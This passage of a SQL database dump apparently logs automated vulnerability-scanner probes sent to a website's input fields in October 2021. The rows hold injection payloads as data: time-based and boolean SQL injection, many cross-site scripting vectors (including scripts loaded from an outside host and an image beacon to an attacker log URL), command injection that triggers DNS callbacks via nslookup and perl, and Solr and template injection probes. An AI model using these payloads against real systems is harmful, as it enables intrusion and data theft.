20:00:53'),(11152,'dFLz8zoZ\' OR 114=(SELECT 114 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 20:02:05'),(11162,'sXHgYoUR\') OR 199=(SELECT 199 FROM PG_SLEEP(15))--',3,1,NULL,9,1,1,0,'2021-10-31 20:03:01'),(11166,'4ALmQHAN\')) OR 518=(SELECT 518 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 20:04:21'),(11176,'@@spmz6',0,1,NULL,9,1,1,0,'2021-10-31 20:05:39'),(11194,'*:*&fl=*,id:[value%20v=\'\\u0036\\u0036\\u003699744828\\u0039\\u0039\\u0039\'],name:[value%20v=\'\\u0036\\u0036\\u003699744828\\u0039\\u0039\\u',10,1,NULL,9,1,1,0,'2021-10-31 20:06:24'),(11198,'1pHXG437nO',0,1,NULL,9,1,1,0,'2021-10-31 20:06:26'),(11202,'aaa&shards=http://hitvymixvmyko388e1.bxss.me/solr',0,1,NULL,9,1,1,0,'2021-10-31 20:06:29'),(11214,'response.write(9264328*9797018)',0,1,NULL,9,1,1,0,'2021-10-31 20:06:36'),(11218,'BpRy9oWI',0,1,NULL,9,1,1,0,'2021-10-31 20:06:38'),(11220,'\'+response.write(9264328*9797018)+\'',0,1,NULL,9,1,1,0,'2021-10-31 20:06:40'),(11226,'\"+response.write(9264328*9797018)+\"',0,1,NULL,9,1,1,0,'2021-10-31 20:06:43'),(11258,'echo tutkrr$()\\ evmktm\\nz^xyu||a #\' &echo tutkrr$()\\ evmktm\\nz^xyu||a #|\" &echo tutkrr$()\\ evmktm\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 20:06:59'),(11264,'&echo ykkept$()\\ xvhjrb\\nz^xyu||a #\' &echo ykkept$()\\ xvhjrb\\nz^xyu||a #|\" &echo ykkept$()\\ xvhjrb\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 20:07:03'),(11266,'${10000436+9999588}',0,1,NULL,9,1,1,0,'2021-10-31 20:07:04'),(11272,'|echo ovqzoe$()\\ uaalqj\\nz^xyu||a #\' |echo ovqzoe$()\\ uaalqj\\nz^xyu||a #|\" |echo ovqzoe$()\\ uaalqj\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 20:07:07'),(11280,'thất&n976035=v952157',2,1,NULL,9,1,1,0,'2021-10-31 20:07:12'),(11284,'(nslookup hitmkyeeaiovd7772f.bxss.me||perl -e \"gethostbyname(\'hitmkyeeaiovd7772f.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 20:07:13'),(11296,'$(nslookup hitbyeugvagek9bc1b.bxss.me||perl -e \"gethostbyname(\'hitbyeugvagek9bc1b.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 20:07:18'),(11300,'\'.gethostbyname(lc(\'hitpu\'.\'mhrpooov54f83.bxss.me.\')).\'A\'.chr(67).chr(hex(\'58\')).chr(109).chr(65).chr(118).chr(88).\'',3,1,NULL,9,1,1,0,'2021-10-31 20:07:21'),(11304,'&(nslookup hitgyewpqqcfu8a12d.bxss.me||perl -e \"gethostbyname(\'hitgyewpqqcfu8a12d.bxss.me\')\")&\'\\\"`0&(nslookup hitgyewpqqcfu8a12d',0,1,NULL,9,1,1,0,'2021-10-31 20:07:23'),(11306,'\".gethostbyname(lc(\"hitun\".\"xsblodll0cea0.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(120).chr(69).chr(101).chr(74).\"',0,1,NULL,9,1,1,0,'2021-10-31 20:07:24'),(11313,'|(nslookup hitxzgfxnxccm2e2a0.bxss.me||perl -e \"gethostbyname(\'hitxzgfxnxccm2e2a0.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 20:07:28'),(11321,'`(nslookup hitfymbjolpkvbdb20.bxss.me||perl -e \"gethostbyname(\'hitfymbjolpkvbdb20.bxss.me\')\")`',0,1,NULL,9,1,1,0,'2021-10-31 20:07:31'),(11331,';(nslookup hitnmfzlopgla7a45f.bxss.me||perl -e \"gethostbyname(\'hitnmfzlopgla7a45f.bxss.me\')\")|(nslookup hitnmfzlopgla7a45f.bxss.',0,1,NULL,9,1,1,0,'2021-10-31 20:07:36'),(11361,'\"+\"A\".concat(70-3).concat(22*4).concat(112).concat(88).concat(101).concat(69)+(require\"socket\"\nSocket.gethostbyname(\"hitwd\"+\"hwy',0,1,NULL,9,1,1,0,'2021-10-31 20:07:49'),(11369,'\'+\'A\'.concat(70-3).concat(22*4).concat(104).concat(87).concat(122).concat(79)+(require\'socket\'\nSocket.gethostbyname(\'hitnb\'+\'wtm',27,1,NULL,9,1,1,0,'2021-10-31 20:07:55'),(11414,'928456',0,1,NULL,9,1,1,0,'2021-10-31 20:08:33'),(11532,'thất\'\"()&%<acx><ScRiPt >bplp(9592)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 20:11:32'),(11534,'\'\"()&%<acx><ScRiPt >bplp(9639)</ScRiPt>',0,1,NULL,9,1,1,0,'2021-10-31 20:11:33'),(11536,'thất9932065',0,1,NULL,9,1,1,0,'2021-10-31 20:11:36'),(11538,'thất9932065<',0,1,NULL,9,1,1,0,'2021-10-31 20:11:39'),(11540,'acu3126＜s1﹥s2ʺs3ʹuca3126',0,1,NULL,9,1,1,0,'2021-10-31 20:11:42'),(11542,'acux1245??z1??z2a?bcxuca1245',0,1,NULL,9,1,1,0,'2021-10-31 20:11:44'),(11564,'acu6839＜s1﹥s2ʺs3ʹuca6839',0,1,NULL,9,1,1,0,'2021-10-31 20:12:13'),(11566,'acux5530??z1??z2a?bcxuca5530',0,1,NULL,9,1,1,0,'2021-10-31 20:12:15'),(11588,'acu9252＜s1﹥s2ʺs3ʹuca9252',0,1,NULL,9,1,1,0,'2021-10-31 20:12:43'),(11590,'acux2724??z1??z2a?bcxuca2724',0,1,NULL,9,1,1,0,'2021-10-31 20:12:46'),(11612,'acu2583＜s1﹥s2ʺs3ʹuca2583',0,1,NULL,9,1,1,0,'2021-10-31 20:13:24'),(11614,'acux6685??z1??z2a?bcxuca6685',0,1,NULL,9,1,1,0,'2021-10-31 20:13:27'),(11636,'thất\"onmouseover=bplp(99692)\"',2,1,NULL,9,1,1,0,'2021-10-31 20:13:58'),(11638,'thất\" RMRJ=bplp([!+!]) CTE=\"',2,1,NULL,9,1,1,0,'2021-10-31 20:14:03'),(11640,'thất\\u0022onmouseover=bplp(90023)\\u0022',2,1,NULL,9,1,1,0,'2021-10-31 20:14:08'),(11642,'%74%68%E1%BA%A5%74%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%62%70%6C%70%28%39%33%36%36%34%29%22',20,1,NULL,9,1,1,0,'2021-10-31 20:14:10'),(11644,'?\"onmouseover=bplp(90275)//',0,1,NULL,9,1,1,0,'2021-10-31 20:14:12'),(11646,'thất\"sTYLe=\'acu:Expre/**/SSion(bplp(9797))\'bad=\"',2,1,NULL,9,1,1,0,'2021-10-31 20:14:15'),(11650,'thất\"><script>bplp(9410)</script>',2,1,NULL,9,1,1,0,'2021-10-31 20:14:18'),(11652,'thất</title><ScRiPt >bplp(9865)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 20:14:21'),(11654,'thất<ScRiPt >bplp(9381)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 20:14:25'),(11656,'thất<W8DYS6>WKGTU[!+!]</W8DYS6>',2,1,NULL,9,1,1,0,'2021-10-31 20:14:29'),(11658,'thất<script>bplp(9567)</script>',2,1,NULL,9,1,1,0,'2021-10-31 20:14:34'),(11660,'thất<ScR<ScRiPt>IpT>bplp(9152)</sCr<ScRiPt>IpT>',2,1,NULL,9,1,1,0,'2021-10-31 20:14:36'),(11662,'thất<ScRiPt \r\n>bplp(9337)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 20:14:39'),(11664,'thất<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9946></ScRiPt>',17,1,NULL,9,1,1,0,'2021-10-31 20:14:42'),(11668,'thất<\0ScRiPt \r\n>bplp(9104)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 20:14:46'),(11670,'thất<svg	\n\r?\0onload=bplp(9191);>',2,1,NULL,9,1,1,0,'2021-10-31 20:14:52'),(11672,'thất<isindex type=image src=1 onerror=bplp(9376)>',2,1,NULL,9,1,1,0,'2021-10-31 20:14:55'),(11674,'thất<iframe src=\'data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=\' invalid=\'9768\'>',2,1,NULL,9,1,1,0,'2021-10-31 20:14:58'),(11676,'thất<body onload=bplp(9671)>',2,1,NULL,9,1,1,0,'2021-10-31 20:15:00'),(11678,'thất<img src=//xss.bxss.me/t/dot.gif onload=bplp(9471)>',2,1,NULL,9,1,1,0,'2021-10-31 20:15:04'),(11680,'thất<img src=xyz OnErRor=bplp(9098)>',2,1,NULL,9,1,1,0,'2021-10-31 20:15:08'),(11682,'thất<img/src=\">\" onerror=alert(9037)>',2,1,NULL,9,1,1,0,'2021-10-31 20:15:11'),(11684,'%74%68%E1%BA%A5%74%3C%53%63%52%69%50%74%20%3E%62%70%6C%70%289310%29%3C%2F%73%43%72%69%70%54%3E',11,1,NULL,9,1,1,0,'2021-10-31 20:15:15'),(11686,'thất\\u003CScRiPt\\bplp(9135)\\u003C/sCripT\\u003E',2,1,NULL,9,1,1,0,'2021-10-31 20:15:19'),(11688,'thất&lt;ScRiPt&gt;bplp(9787)&lt;/sCripT&gt;',2,1,NULL,9,1,1,0,'2021-10-31 20:15:23'),(11690,'?<img acu onmouseover=bplp(94191) //?>',0,1,NULL,9,1,1,0,'2021-10-31 20:15:28'),(11694,'thất<input autofocus onfocus=bplp(9757)>',2,1,NULL,9,1,1,0,'2021-10-31 20:15:32'),(11700,'thất}body{acu:Expre/**/SSion(bplp(9067))}',2,1,NULL,9,1,1,0,'2021-10-31 20:15:46'),(11702,'thấtclw1Z\n<ScRiPt >bplp(9847)</ScRiPt>',0,1,NULL,9,1,1,0,'2021-10-31 20:15:51'),(11704,'thất<WSYKBH>XAB5O[!+!]</WSYKBH>',2,1,NULL,9,1,1,0,'2021-10-31 20:15:55'),(11708,'thất<ifRAme sRc=9528.com></IfRamE>',2,1,NULL,9,1,1,0,'2021-10-31 20:16:00'),(11710,'thất<aImTSA1 x=9720>',2,1,NULL,9,1,1,0,'2021-10-31 20:16:02'),(11712,'thất<img sRc=\'http://attacker-9017/log.php?',2,1,NULL,9,1,1,0,'2021-10-31 20:16:05'),(11714,'thất<aAXMBno<',2,1,NULL,9,1,1,0,'2021-10-31 20:16:09'),(11742,'Y8uTTiti',0,1,NULL,9,1,1,0,'2021-10-31 20:23:19'),(11744,'thất\' AND 2*3*8=6*8 AND \'au6q\'=\'au6q',37,1,NULL,9,1,1,0,'2021-10-31 20:23:22'),(11746,'thất\" AND 2*3*8=6*8 AND \"t6MJ\"=\"t6MJ',37,1,NULL,9,1,1,0,'2021-10-31 20:23:25'),(11748,'thất%\' AND 2*3*8=6*8 AND \'42CN\'!=\'42CN%',37,1,NULL,9,1,1,0,'2021-10-31 20:23:28'),(11750,'-1 OR 2+647-647-1=0+0+0+1',19,1,NULL,9,1,1,0,'2021-10-31 20:23:31'),(11754,'-1 OR 3+647-647-1=0+0+0+1',26,1,NULL,9,1,1,0,'2021-10-31 20:23:33'),(11758,'-1 OR 3*2<(0+5+647-647)',48,1,NULL,9,1,1,0,'2021-10-31 20:23:37'),(11762,'-1 OR 3*2>(0+5+647-647)',48,1,NULL,9,1,1,0,'2021-10-31 20:23:40'),(11776,'jrO6a2Qw',0,1,NULL,9,1,1,0,'2021-10-31 20:26:18'),(11778,'thất\' AND 2*3*8=6*8 AND \'iTAf\'=\'iTAf',37,1,NULL,9,1,1,0,'2021-10-31 20:26:25'),(11782,'thất\" AND 2*3*8=6*8 AND \"Cc1Q\"=\"Cc1Q',37,1,NULL,9,1,1,0,'2021-10-31 20:26:28'),(11784,'thất%\' AND 2*3*8=6*8 AND \'R53v\'!=\'R53v%',37,1,NULL,9,1,1,0,'2021-10-31 20:26:31'),(11786,'-1 OR 2+804-804-1=0+0+0+1',19,1,NULL,9,1,1,0,'2021-10-31 20:26:35'),(11788,'-1 OR 3+804-804-1=0+0+0+1',26,1,NULL,9,1,1,0,'2021-10-31 20:26:41'),(11790,'-1 OR 3*2<(0+5+804-804)',48,1,NULL,9,1,1,0,'2021-10-31 20:26:45'),(11792,'-1 OR 3*2>(0+5+804-804)',48,1,NULL,9,1,1,0,'2021-10-31 20:26:47'),(11804,'TUuESyyq\'; waitfor delay \'0:0:15\' --',2,1,NULL,9,1,1,0,'2021-10-31 20:31:01'),(11808,'h2P3rLOl\' OR 635=(SELECT 635 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 20:32:40'),(11812,'B6rUFFqo\') OR 834=(SELECT 834 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 20:33:32'),(11816,'cKfvS17a\')) OR 548=(SELECT 548 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 20:34:59'),(11818,'Ti5Z6J4O\'; waitfor delay \'0:0:15\' --',2,1,NULL,9,1,1,0,'2021-10-31 20:35:16'),(11826,'@@yMgfo',0,1,NULL,9,1,1,0,'2021-10-31 20:36:05'),(11828,'34eUIWlR\' OR 979=(SELECT 979 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 20:36:11'),(11830,'IryCRnCd\') OR 203=(SELECT 203 FROM PG_SLEEP(15))--',3,1,NULL,9,1,1,0,'2021-10-31 20:37:00'),(11832,'VnjqaKAw\')) OR 823=(SELECT 823 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 20:37:54'),(11840,'@@NDqMN',0,1,NULL,9,1,1,0,'2021-10-31 20:38:47'),(11848,'*:*&fl=*,id:[value%20v=\'\\u0036\\u0036\\u003696121515\\u0039\\u0039\\u0039\'],name:[value%20v=\'\\u0036\\u0036\\u003696121515\\u0039\\u0039\\u',10,1,NULL,9,1,1,0,'2021-10-31 20:50:30'),(11850,'17tGC692IO',0,1,NULL,9,1,1,0,'2021-10-31 20:50:31'),(11852,'aaa&shards=http://hitnxrpqzskry850ec.bxss.me/solr',0,1,NULL,9,1,1,0,'2021-10-31 20:50:33'),(11868,'response.write(9048452*9218201)',0,1,NULL,9,1,1,0,'2021-10-31 20:50:59'),(11872,'\'+response.write(9048452*9218201)+\'',0,1,NULL,9,1,1,0,'2021-10-31 20:51:03'),(11878,'\"+response.write(9048452*9218201)+\"',0,1,NULL,9,1,1,0,'2021-10-31 20:51:07'),(11892,'BG39ZPLG',0,1,NULL,9,1,1,0,'2021-10-31 20:51:17'),(11958,'${9999017+9999943}',0,1,NULL,9,1,1,0,'2021-10-31 20:52:01'),(11976,'echo ysfgkj$()\\ glxucj\\nz^xyu||a #\' &echo ysfgkj$()\\ glxucj\\nz^xyu||a #|\" &echo ysfgkj$()\\ glxucj\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 20:52:12'),(11980,'&echo kwdmqi$()\\ fuvxsb\\nz^xyu||a #\' &echo kwdmqi$()\\ fuvxsb\\nz^xyu||a #|\" &echo kwdmqi$()\\ fuvxsb\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 20:52:16'),(11982,'thất&n963768=v941880',2,1,NULL,9,1,1,0,'2021-10-31 20:52:17'),(11990,'|echo tvcqbn$()\\ uwemjh\\nz^xyu||a #\' |echo tvcqbn$()\\ uwemjh\\nz^xyu||a #|\" |echo tvcqbn$()\\ uwemjh\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 20:52:22'),(11996,'(nslookup hitmuvcugrjlddc639.bxss.me||perl -e \"gethostbyname(\'hitmuvcugrjlddc639.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 20:52:26'),(12002,'$(nslookup hitmqnbugawqmf8572.bxss.me||perl -e \"gethostbyname(\'hitmqnbugawqmf8572.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 20:52:30'),(12008,'&(nslookup hitmyioccpkxyeaf05.bxss.me||perl -e \"gethostbyname(\'hitmyioccpkxyeaf05.bxss.me\')\")&\'\\\"`0&(nslookup hitmyioccpkxyeaf05',0,1,NULL,9,1,1,0,'2021-10-31 20:52:33'),(12016,'|(nslookup hitiiqgtlggoq6055a.bxss.me||perl -e \"gethostbyname(\'hitiiqgtlggoq6055a.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 20:52:37'),(12018,'\'.gethostbyname(lc(\'hitfj\'.\'xqlgqdej26a87.bxss.me.\')).\'A\'.chr(67).chr(hex(\'58\')).chr(118).chr(83).chr(121).chr(89).\'',4,1,NULL,9,1,1,0,'2021-10-31 20:52:39'),(12020,'`(nslookup hitkvkeqgjqoe69cda.bxss.me||perl -e \"gethostbyname(\'hitkvkeqgjqoe69cda.bxss.me\')\")`',0,1,NULL,9,1,1,0,'2021-10-31 20:52:40'),(12026,'\".gethostbyname(lc(\"hitjl\".\"mnlkyizq740a3.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(114).chr(73).chr(107).chr(65).\"',0,1,NULL,9,1,1,0,'2021-10-31 20:52:43'),(12028,';(nslookup hitaanpzybwlnc3339.bxss.me||perl -e \"gethostbyname(\'hitaanpzybwlnc3339.bxss.me\')\")|(nslookup hitaanpzybwlnc3339.bxss.',0,1,NULL,9,1,1,0,'2021-10-31 20:52:45'),(12087,'\"+\"A\".concat(70-3).concat(22*4).concat(99).concat(79).concat(112).concat(85)+(require\"socket\"\nSocket.gethostbyname(\"hitdo\"+\"elor',0,1,NULL,9,1,1,0,'2021-10-31 20:53:23'),(12095,'\'+\'A\'.concat(70-3).concat(22*4).concat(109).concat(72).concat(97).concat(75)+(require\'socket\'\nSocket.gethostbyname(\'hitau\'+\'lcbf',32,1,NULL,9,1,1,0,'2021-10-31 20:53:30'),(12178,'925707',0,1,NULL,9,1,1,0,'2021-10-31 20:54:28'),(12396,'thất\'\"()&%<acx><ScRiPt >ZOrG(9585)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 21:01:07'),(12398,'\'\"()&%<acx><ScRiPt >ZOrG(9267)</ScRiPt>',0,1,NULL,9,1,1,0,'2021-10-31 21:01:12'),(12400,'thất9651163',0,1,NULL,9,1,1,0,'2021-10-31 21:01:16'),(12402,'thất9651163<',0,1,NULL,9,1,1,0,'2021-10-31 21:01:19'),(12404,'acu1964＜s1﹥s2ʺs3ʹuca1964',0,1,NULL,9,1,1,0,'2021-10-31 21:01:22'),(12406,'acux10189??z1??z2a?bcxuca10189',0,1,NULL,9,1,1,0,'2021-10-31 21:01:25'),(12428,'acu6105＜s1﹥s2ʺs3ʹuca6105',0,1,NULL,9,1,1,0,'2021-10-31 21:02:11'),(12430,'acux7448??z1??z2a?bcxuca7448',0,1,NULL,9,1,1,0,'2021-10-31 21:02:16'),(12450,'thất\"onmouseover=ZOrG(92012)\"',2,1,NULL,9,1,1,0,'2021-10-31 21:02:49'),(12452,'thất\" tGiJ=ZOrG([!+!]) ARM=\"',2,1,NULL,9,1,1,0,'2021-10-31 21:02:53'),(12454,'thất\\u0022onmouseover=ZOrG(97983)\\u0022',2,1,NULL,9,1,1,0,'2021-10-31 21:02:56'),(12456,'%74%68%E1%BA%A5%74%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%5A%4F%72%47%28%39%31%30%32%34%29%22',17,1,NULL,9,1,1,0,'2021-10-31 21:02:59'),(12458,'?\"onmouseover=ZOrG(94675)//',0,1,NULL,9,1,1,0,'2021-10-31 21:03:01'),(12460,'thất\"sTYLe=\'acu:Expre/**/SSion(ZOrG(9693))\'bad=\"',2,1,NULL,9,1,1,0,'2021-10-31 21:03:04'),(12462,'thất\"><script>ZOrG(9435)</script>',2,1,NULL,9,1,1,0,'2021-10-31 21:03:06'),(12464,'thất</title><ScRiPt >ZOrG(9100)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 21:03:09'),(12512,'SxNzSlFQ',0,1,NULL,9,1,1,0,'2021-10-31 21:22:16'),(12514,'thất\' AND 2*3*8=6*8 AND \'FCWX\'=\'FCWX',37,1,NULL,9,1,1,0,'2021-10-31 21:22:23'),(12516,'thất\" AND 2*3*8=6*8 AND \"qjdg\"=\"qjdg',37,1,NULL,9,1,1,0,'2021-10-31 21:22:32'),(12518,'thất%\' AND 2*3*8=6*8 AND \'MgWp\'!=\'MgWp%',37,1,NULL,9,1,1,0,'2021-10-31 21:22:38'),(12520,'-1 OR 2+615-615-1=0+0+0+1',19,1,NULL,9,1,1,0,'2021-10-31 21:22:43'),(12522,'-1 OR 3+615-615-1=0+0+0+1',26,1,NULL,9,1,1,0,'2021-10-31 21:22:49'),(12524,'-1 OR 3*2<(0+5+615-615)',48,1,NULL,9,1,1,0,'2021-10-31 21:22:54'),(12526,'-1 OR 3*2>(0+5+615-615)',48,1,NULL,9,1,1,0,'2021-10-31 21:23:00'),(12542,'*:*&fl=*,id:[value%20v=\'\\u0036\\u0036\\u003699659353\\u0039\\u0039\\u0039\'],name:[value%20v=\'\\u0036\\u0036\\u003699659353\\u0039\\u0039\\u',10,1,NULL,9,1,1,0,'2021-10-31 21:29:35'),(12548,'aaa&shards=http://hitafggitiyfp44766.bxss.me/solr',0,1,NULL,9,1,1,0,'2021-10-31 21:29:41'),(12550,'1C2ZDyCdmGO',0,1,NULL,9,1,1,0,'2021-10-31 21:29:42'),(12576,'response.write(9177509*9241151)',0,1,NULL,9,1,1,0,'2021-10-31 21:30:05'),(12578,'gn2UXryw',0,1,NULL,9,1,1,0,'2021-10-31 21:30:07'),(12582,'\'+response.write(9177509*9241151)+\'',0,1,NULL,9,1,1,0,'2021-10-31 21:30:10'),(12590,'\"+response.write(9177509*9241151)+\"',0,1,NULL,9,1,1,0,'2021-10-31 21:30:15'),(12628,'${10000152+10000226}',0,1,NULL,9,1,1,0,'2021-10-31 21:30:37'),(12660,'thất&n915952=v956048',2,1,NULL,9,1,1,0,'2021-10-31 21:30:57'),(12668,'1rZK4U7B\'; waitfor delay \'0:0:15\' --',2,1,NULL,9,1,1,0,'2021-10-31 21:31:00'),(12706,'echo smlmzx$()\\ ldwami\\nz^xyu||a #\' &echo smlmzx$()\\ ldwami\\nz^xyu||a #|\" &echo smlmzx$()\\ ldwami\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 21:31:21'),(12712,'\'.gethostbyname(lc(\'hittm\'.\'yvdmrqjhb985d.bxss.me.\')).\'A\'.chr(67).chr(hex(\'58\')).chr(97).chr(67).chr(111).chr(69).\'',3,1,NULL,9,1,1,0,'2021-10-31 21:31:25'),(12716,'&echo jjksly$()\\ uqbdvn\\nz^xyu||a #\' &echo jjksly$()\\ uqbdvn\\nz^xyu||a #|\" &echo jjksly$()\\ uqbdvn\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 21:31:27'),(12721,'\".gethostbyname(lc(\"hitem\".\"ijmvnfzd0d358.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(97).chr(80).chr(119).chr(84).\"',0,1,NULL,9,1,1,0,'2021-10-31 21:31:30'),(12729,'|echo tgkedm$()\\ eumzwj\\nz^xyu||a #\' |echo tgkedm$()\\ eumzwj\\nz^xyu||a #|\" |echo tgkedm$()\\ eumzwj\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 21:31:33'),(12739,'(nslookup hitdsawbbdhwz6cc42.bxss.me||perl -e \"gethostbyname(\'hitdsawbbdhwz6cc42.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 21:31:38'),(12749,'$(nslookup hitknqrynrwcocdb0a.bxss.me||perl -e \"gethostbyname(\'hitknqrynrwcocdb0a.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 21:31:43'),(12755,'&(nslookup hitriyingqngc5705a.bxss.me||perl -e \"gethostbyname(\'hitriyingqngc5705a.bxss.me\')\")&\'\\\"`0&(nslookup hitriyingqngc5705a',0,1,NULL,9,1,1,0,'2021-10-31 21:31:47'),(12767,'|(nslookup hitfaqdukljlf25bad.bxss.me||perl -e \"gethostbyname(\'hitfaqdukljlf25bad.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 21:31:53'),(12777,'`(nslookup hitffpylrwedd7744d.bxss.me||perl -e \"gethostbyname(\'hitffpylrwedd7744d.bxss.me\')\")`',0,1,NULL,9,1,1,0,'2021-10-31 21:31:58'),(12787,';(nslookup hitigdryyscmqa9b01.bxss.me||perl -e \"gethostbyname(\'hitigdryyscmqa9b01.bxss.me\')\")|(nslookup hitigdryyscmqa9b01.bxss.',0,1,NULL,9,1,1,0,'2021-10-31 21:32:05'),(12801,'\"+\"A\".concat(70-3).concat(22*4).concat(113).concat(66).concat(97).concat(77)+(require\"socket\"\nSocket.gethostbyname(\"hitrg\"+\"dpte',0,1,NULL,9,1,1,0,'2021-10-31 21:32:12'),(12815,'\'+\'A\'.concat(70-3).concat(22*4).concat(112).concat(77).concat(110).concat(82)+(require\'socket\'\nSocket.gethostbyname(\'hitzf\'+\'xlj',29,1,NULL,9,1,1,0,'2021-10-31 21:32:19'),(12868,'0AncR90C\' OR 141=(SELECT 141 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 21:32:49'),(12886,'946577',0,1,NULL,9,1,1,0,'2021-10-31 21:33:01'),(12938,'OBpLD1l0\') OR 646=(SELECT 646 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 21:34:01'),(13004,'NkH4D0Ra\')) OR 627=(SELECT 627 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 21:36:11'),(13070,'@@dmWbj',0,1,NULL,9,1,1,0,'2021-10-31 21:38:27'),(13104,'thất\'\"()&%<acx><ScRiPt >SY88(9872)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 21:39:42'),(13106,'\'\"()&%<acx><ScRiPt >SY88(9082)</ScRiPt>',0,1,NULL,9,1,1,0,'2021-10-31 21:39:47'),(13108,'thất9507543',0,1,NULL,9,1,1,0,'2021-10-31 21:39:55'),(13110,'thất9507543<',0,1,NULL,9,1,1,0,'2021-10-31 21:40:00'),(13112,'acu5618＜s1﹥s2ʺs3ʹuca5618',0,1,NULL,9,1,1,0,'2021-10-31 21:40:05'),(13114,'acux7584??z1??z2a?bcxuca7584',0,1,NULL,9,1,1,0,'2021-10-31 21:40:11'),(13136,'acu1608＜s1﹥s2ʺs3ʹuca1608',0,1,NULL,9,1,1,0,'2021-10-31 21:41:08'),(13138,'acux6655??z1??z2a?bcxuca6655',0,1,NULL,9,1,1,0,'2021-10-31 21:41:16'),(13160,'thất\"onmouseover=SY88(90882)\"',2,1,NULL,9,1,1,0,'2021-10-31 21:42:15'),(13162,'thất\" Sh5e=SY88([!+!]) yKe=\"',2,1,NULL,9,1,1,0,'2021-10-31 21:42:19'),(13164,'thất\\u0022onmouseover=SY88(98603)\\u0022',2,1,NULL,9,1,1,0,'2021-10-31 21:42:26'),(13166,'%74%68%E1%BA%A5%74%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%53%59%38%38%28%39%39%38%33%34%29%22',19,1,NULL,9,1,1,0,'2021-10-31 21:42:30'),(13168,'?\"onmouseover=SY88(92285)//',0,1,NULL,9,1,1,0,'2021-10-31 21:42:34'),(13170,'thất\"sTYLe=\'acu:Expre/**/SSion(SY88(9239))\'bad=\"',2,1,NULL,9,1,1,0,'2021-10-31 21:42:38'),(13172,'thất\"><script>SY88(9849)</script>',2,1,NULL,9,1,1,0,'2021-10-31 21:42:43'),(13174,'thất</title><ScRiPt >SY88(9411)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 21:42:49'),(13234,'1BsmcGbkpEO',0,1,NULL,9,1,1,0,'2021-10-31 22:13:49'),(13236,'*:*&fl=*,id:[value%20v=\'\\u0036\\u0036\\u003691835816\\u0039\\u0039\\u0039\'],name:[value%20v=\'\\u0036\\u0036\\u003691835816\\u0039\\u0039\\u',10,1,NULL,9,1,1,0,'2021-10-31 22:14:09'),(13248,'7wUaDgy6',0,1,NULL,9,1,1,0,'2021-10-31 22:14:18'),(13250,'aaa&shards=http://hitbuzednnvdw15c7b.bxss.me/solr',0,1,NULL,9,1,1,0,'2021-10-31 22:14:20'),(13262,'response.write(9906074*9730155)',0,1,NULL,9,1,1,0,'2021-10-31 22:14:27'),(13266,'\'+response.write(9906074*9730155)+\'',0,1,NULL,9,1,1,0,'2021-10-31 22:14:31'),(13274,'\"+response.write(9906074*9730155)+\"',0,1,NULL,9,1,1,0,'2021-10-31 22:14:36'),(13298,'${9999012+9999537}',0,1,NULL,9,1,1,0,'2021-10-31 22:14:51'),(13308,'echo jujbho$()\\ swqlbd\\nz^xyu||a #\' &echo jujbho$()\\ swqlbd\\nz^xyu||a #|\" &echo jujbho$()\\ swqlbd\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 22:14:57'),(13310,'thất&n964477=v935411',2,1,NULL,9,1,1,0,'2021-10-31 22:14:59'),(13314,'&echo glczjy$()\\ lzsdjh\\nz^xyu||a #\' &echo glczjy$()\\ lzsdjh\\nz^xyu||a #|\" &echo glczjy$()\\ lzsdjh\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 22:15:01'),(13322,'|echo ytqezf$()\\ strgek\\nz^xyu||a #\' |echo ytqezf$()\\ strgek\\nz^xyu||a #|\" |echo ytqezf$()\\ strgek\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 